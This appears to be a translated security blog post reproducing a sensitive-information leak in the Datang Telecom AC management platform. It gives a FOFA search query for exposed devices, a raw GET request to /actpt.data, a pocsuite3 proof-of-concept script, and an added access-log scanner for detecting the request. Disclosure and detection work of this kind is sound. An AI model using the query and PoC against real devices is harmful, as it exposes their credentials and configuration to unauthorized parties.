Vulnerability reproduction: Datang Telecom AC centralized management platform sensitive information leakage vulnerability (with vulnerability detection script)

Disclaimer

The vulnerabilities covered in this article have been fixed, and sensitive information has been masked. The article is for experience sharing only. Do not take it seriously. Unauthorized attacks are illegal! Sensitive information in the article has been processed at multiple levels. The user is responsible for any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article. The author bears no responsibility for them.

Vulnerability description

The Datang Telecom AC centralized management platform has a sensitive information leakage vulnerability.

FOFA query

app="大唐电信AC集中管理平台" && fid="gmqJFLGz7L/7TdQxUJFBXQ=="

PoC and detection

GET /actpt.data HTTP/1.1
Host: 
Referer: http://<target>/relogin.htm
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

PoC script

The script is written for the pocsuite framework.

# _*_ coding:utf-8 _*_
# @Time : 2023/12/22
# @Author: 炼金术师诸葛亮
from pocsuite3.api import POCBase, register_poc, requests, logger


class datang_dianxinAC_information_leakage(POCBase):
    pocDesc = '''大唐电信AC集中管理平台敏感信息泄漏漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-22'
    name = '大唐电信AC集中管理平台敏感信息泄漏漏洞'

    def _verify(self):
        result = {}
        # Build the probe URL without producing a double slash.
        url = self.url.rstrip('/') + '/actpt.data'

        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'Keep-Alive',
            'Pragma': 'no-cache',
            'Upgrade-Insecure-Requests': '1',
            'Cache-Control': 'no-cache'
        }

        try:
            response = requests.get(url, headers=headers)
            # Loose heuristic: a 200 response whose body contains "id"
            # is treated as the exposed data file.
            if response.status_code == 200 and 'id' in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except Exception as e:
            # Log the error and fall through so a failed Output is still returned.
            logger.error(e)

        # An empty result is reported as "not vulnerable" by parse_output.
        return self.parse_output(result)


register_poc(datang_dianxinAC_information_leakage)
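
On the defensive side, the same request can be found in web logs. The following is an added example, not part of the original article or its PoC: it scans access-log lines for requests to /actpt.data and reports whether the file was actually served. It assumes a front-end proxy that writes Combined Log Format; the sample log lines and the names normalize and find_hits are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumption: requests reach the platform through a proxy that writes
# Combined Log Format. The function names here are illustrative.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
SENSITIVE_PATH = "/actpt.data"  # path requested by the PoC on this page


def normalize(target):
    """Reduce a request target to a canonical lower-case path."""
    path = target.split("?", 1)[0].split("#", 1)[0]  # drop query and fragment
    path = unquote(path)                               # %2E -> "."
    # Collapse duplicate slashes and dot segments; lower-casing is a
    # deliberately broad match in case the server ignores case.
    return posixpath.normpath("/" + path.lstrip("/")).lower()


def find_hits(lines):
    """Return (ip, timestamp, status, leaked) for each request to SENSITIVE_PATH."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or normalize(m["target"]) != SENSITIVE_PATH:
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        # A 200 with a non-empty body means the file was sent to the client.
        hits.append((m["ip"], m["ts"], status, status == 200 and size > 0))
    return hits


SAMPLE_LOG = [  # constructed lines; addresses are from documentation ranges
    '198.51.100.7 - - [22/Dec/2023:10:01:02 +0800] "GET /actpt.data HTTP/1.1" 200 1874 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Dec/2023:10:01:05 +0800] "GET /relogin.htm HTTP/1.1" 200 912 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Dec/2023:11:30:44 +0800] "GET //ACTPT%2Edata?x=1 HTTP/1.1" 403 0 "-" "curl/8.4.0"',
    '192.0.2.15 - - [22/Dec/2023:12:00:00 +0800] "GET /static/../actpt.data HTTP/1.1" 200 1874 "-" "-"',
]

if __name__ == "__main__":
    for ip, ts, status, leaked in find_hits(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} {'LEAKED' if leaked else 'blocked or empty'}")
```

Any line reported as leaked means the data file left the device, so credentials or configuration it contains should be treated as exposed.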

Script exploit


Origin blog.csdn.net/jjjj1029056414/article/details/135155552